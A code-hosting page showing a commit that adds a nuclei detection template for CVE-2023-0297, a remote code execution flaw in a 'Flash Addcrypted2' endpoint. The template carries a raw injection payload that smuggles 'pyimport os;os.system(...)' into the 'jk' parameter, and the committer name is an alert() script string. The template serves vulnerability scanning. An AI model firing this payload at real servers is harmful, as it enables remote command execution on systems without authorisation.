daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

CVE-2023-0297.yaml

patch-1
alert('0-0') 2023-07-04 18:21:35 +05:30 committed by GitHub
parent 0f1d287826
commit ac84955ae6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
http/cves/2023/CVE-2023-0297.yaml Normal file
View File

@ -0,0 +1,21 @@
id: flash-addcrypted2-rce
info:
name: Flash Addcrypted2 Remote Code Execution
author: MrHarshvardhan
severity: high
description: |
Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability.
reference:
- https://www.exploit-db.com/exploits/51532
requests:
- method: GET
path:
- /flash/addcrypted2
attacks:
- raw:
- 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
- 'CMD_PLACEHOLDER: "{cmd}"'
predicates:
- type: status
status:
- 200